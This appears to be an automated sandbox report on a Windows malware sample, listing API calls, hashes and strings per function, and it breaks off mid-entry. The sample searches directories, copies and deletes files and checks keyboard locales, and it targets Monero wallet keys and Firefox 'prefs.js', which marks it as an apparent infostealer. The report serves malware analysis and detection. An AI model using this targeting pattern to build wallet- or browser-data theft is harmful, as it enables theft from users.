                                    • Opcode ID: 5665cfdfc2d41d5c31169a88651e50029e46ba3c67138832aa3e0778ec9959a8
                                    • Instruction ID: 56a874a50c035d4c7e239e657e483d238eb8fd38df9cfc3758be7faf91a48fad
                                    • Opcode Fuzzy Hash: 5665cfdfc2d41d5c31169a88651e50029e46ba3c67138832aa3e0778ec9959a8
                                    • Instruction Fuzzy Hash: 326146B1900618AFCB21EBA0DC45EFA77BCBB4C701F048598F609A6141EB75AB45CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E4580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E4587
                                    • wsprintfA.USER32 ref: 000E45A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E45BD
                                    • StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E45EB
                                    • StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E468B
                                    • FindClose.KERNEL32(000000FF), ref: 000E46A0
                                    • lstrcat.KERNEL32(?,00B812C8), ref: 000E46C5
                                    • lstrcat.KERNEL32(?,00B7FE60), ref: 000E46D8
                                    • lstrlen.KERNEL32(?), ref: 000E46E5
                                    • lstrlen.KERNEL32(?), ref: 000E46F6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 20067cd23ed7abc6e65b97461e6159fdcfadc56cb3930d9ecfb67ed53ba62c19
                                    • Instruction ID: bdd9027de44d0c090a6f274559f2efaaef803ef340ba11e1e71dfef39425ff8f
                                    • Opcode Fuzzy Hash: 20067cd23ed7abc6e65b97461e6159fdcfadc56cb3930d9ecfb67ed53ba62c19
                                    • Instruction Fuzzy Hash: 00518AB1900218AFC721EBB0DC89FED777CAB5C301F408589F60996191EF749B848F92
                                    APIs
                                    • wsprintfA.USER32 ref: 000E3EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E3EDA
                                    • StrCmpCA.SHLWAPI(?,000F0FAC), ref: 000E3F08
                                    • StrCmpCA.SHLWAPI(?,000F0FB0), ref: 000E3F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E406C
                                    • FindClose.KERNEL32(000000FF), ref: 000E4081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 4c2116a5941b16f1a1f3eafd7c94af1249ed60229dbe48a9633cfd305f99f47e
                                    • Instruction ID: 09d1aa97b24ed708f7e942ac8f83f0e431ece8aa74466fa1e0cdcefa267a76ef
                                    • Opcode Fuzzy Hash: 4c2116a5941b16f1a1f3eafd7c94af1249ed60229dbe48a9633cfd305f99f47e
                                    • Instruction Fuzzy Hash: C45188B5900618AFCB25EBB0DC85EFA777CBB48301F04859CF359A6041DB759B898F51
                                    APIs
                                    • wsprintfA.USER32 ref: 000DED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000DED55
                                    • StrCmpCA.SHLWAPI(?,000F1538), ref: 000DEDAB
                                    • StrCmpCA.SHLWAPI(?,000F153C), ref: 000DEDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DF2AE
                                    • FindClose.KERNEL32(000000FF), ref: 000DF2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: bf95585dcb978cd8f9c6cc1c212d9a632832a272f59936b229264b8414bf3f67
                                    • Instruction ID: 4d8eaf803c0f1ac2fe540010c15f09b51933e967f37f74086dfaecb7fb21a043
                                    • Opcode Fuzzy Hash: bf95585dcb978cd8f9c6cc1c212d9a632832a272f59936b229264b8414bf3f67
                                    • Instruction Fuzzy Hash: 1CE15171A111589EEB54FB61DD92EEE7338AF59300F414199B10A72093EE307F8ACF62
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F15B8,000F0D96), ref: 000DF71E
                                    • StrCmpCA.SHLWAPI(?,000F15BC), ref: 000DF76F
                                    • StrCmpCA.SHLWAPI(?,000F15C0), ref: 000DF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 000DFAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: a6c389b76d07982af09d1c04a06018b8485a456e8a9bad40a590b7eb35eb679c
                                    • Instruction ID: eb139ccd97db6679a247ce560e59405d95c9dbe64e00ad8ed895852ce7748f33
                                    • Opcode Fuzzy Hash: a6c389b76d07982af09d1c04a06018b8485a456e8a9bad40a590b7eb35eb679c
                                    • Instruction Fuzzy Hash: 2CB17671A002489FDB24FF61DD95AFD7379AF59300F0181A9A50AA7143EF306B49CFA2
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F510C,?,?,?,000F51B4,?,?,00000000,?,00000000), ref: 000D1923
                                    • StrCmpCA.SHLWAPI(?,000F525C), ref: 000D1973
                                    • StrCmpCA.SHLWAPI(?,000F5304), ref: 000D1989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000D1D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 000D1DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000D1E20
                                    • FindClose.KERNEL32(000000FF), ref: 000D1E32
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: b82eff8642abaed2cb55538bd04df3a68107b6783a605489e0ea5307c130703a
                                    • Instruction ID: bece7929a923d49ef996997411bb5126089abfa236883130fa383409a58060b9
                                    • Opcode Fuzzy Hash: b82eff8642abaed2cb55538bd04df3a68107b6783a605489e0ea5307c130703a
                                    • Instruction Fuzzy Hash: 3A125F71A10158AFDB25EB61DD96AEE7379AF19300F414199B10A72093EF307F89CFA1
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000F0C2E), ref: 000DDE5E
                                    • StrCmpCA.SHLWAPI(?,000F14C8), ref: 000DDEAE
                                    • StrCmpCA.SHLWAPI(?,000F14CC), ref: 000DDEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DE3E0
                                    • FindClose.KERNEL32(000000FF), ref: 000DE3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 50b7a629444c2330113a2d152a61e800617227bd4f70b82ef6c496fd5feaff2b
                                    • Instruction ID: e43aeee78b5712e461ffe7365119a8576d17eafb5f8e2bb18760fb77a4d67522
                                    • Opcode Fuzzy Hash: 50b7a629444c2330113a2d152a61e800617227bd4f70b82ef6c496fd5feaff2b
                                    • Instruction Fuzzy Hash: DCF1DD719101589EDB25FB61DD95AEE7339BF59300F81419AA10A72093EF307B8ACF62
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F14B0,000F0C2A), ref: 000DDAEB
                                    • StrCmpCA.SHLWAPI(?,000F14B4), ref: 000DDB33
                                    • StrCmpCA.SHLWAPI(?,000F14B8), ref: 000DDB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DDDCC
                                    • FindClose.KERNEL32(000000FF), ref: 000DDDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: fddecd96b446f20ae6020bedac9384db40667f2eba32f22835423dd09530d05f
                                    • Instruction ID: 977408e3192152fb0c942f3e9fda15536a395d1eed1096d6b321a254f8e2401b
                                    • Opcode Fuzzy Hash: fddecd96b446f20ae6020bedac9384db40667f2eba32f22835423dd09530d05f
                                    • Instruction Fuzzy Hash: 4B915B72A002049BDB14FB71ED969FD737DAF8D300F418559F946A6142EE34AB0DCBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +e;5$=0$E[__$QxW$lm_$})$$_$Do6
                                    • API String ID: 0-1181617521
                                    • Opcode ID: 9e2b2e2b0bd904e89eef5044bd9a5685415a94f412754811c6b281bcbcfa7b01
                                    • Instruction ID: 9e1d08e10b0518da7f36f04a2cab38fa078e8c7f3b8fb7d70b4a10e8d8bbd4b8
                                    • Opcode Fuzzy Hash: 9e2b2e2b0bd904e89eef5044bd9a5685415a94f412754811c6b281bcbcfa7b01
                                    • Instruction Fuzzy Hash: ACB2F7F3A082049FE304AE2DEC8576AFBE9EF94720F1A853DEAC4C7744E53558058796
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,000F05AF), ref: 000E7BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000E7BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 000E7C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000E7C62
                                    • LocalFree.KERNEL32(00000000), ref: 000E7D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 2c72178ed41a21a8eb9f9c619e820677772f3895b10a79b28e13169f767d8e35
                                    • Instruction ID: e0c9b24f5c5c66be60e57eab1f95ad0563a48cf5323141ce7e9fa041871a8388
                                    • Opcode Fuzzy Hash: 2c72178ed41a21a8eb9f9c619e820677772f3895b10a79b28e13169f767d8e35
                                    • Instruction Fuzzy Hash: 85414971A01258AFDB24DB95DC89BEEB3B8FB48700F204199E10976192DB342F85CFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Rnu$;h7}$Fnuo$j~fG$qclY$rtn$zi{
                                    • API String ID: 0-409881537
                                    • Opcode ID: 15cd2d010edddbd122af02dc1ce9cb6f90779accdc65c1b7920053bc3dab6af6
                                    • Instruction ID: 146577e5746859d399e296fbadc350174da373336d8ed6430f2facf7382b4674
                                    • Opcode Fuzzy Hash: 15cd2d010edddbd122af02dc1ce9cb6f90779accdc65c1b7920053bc3dab6af6
                                    • Instruction Fuzzy Hash: B8B239F360C3049FE304AE2DEC9567ABBE9EF94720F16463DE6C4C3744EA7558018696
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000F0D73), ref: 000DE4A2
                                    • StrCmpCA.SHLWAPI(?,000F14F8), ref: 000DE4F2
                                    • StrCmpCA.SHLWAPI(?,000F14FC), ref: 000DE508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DEBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
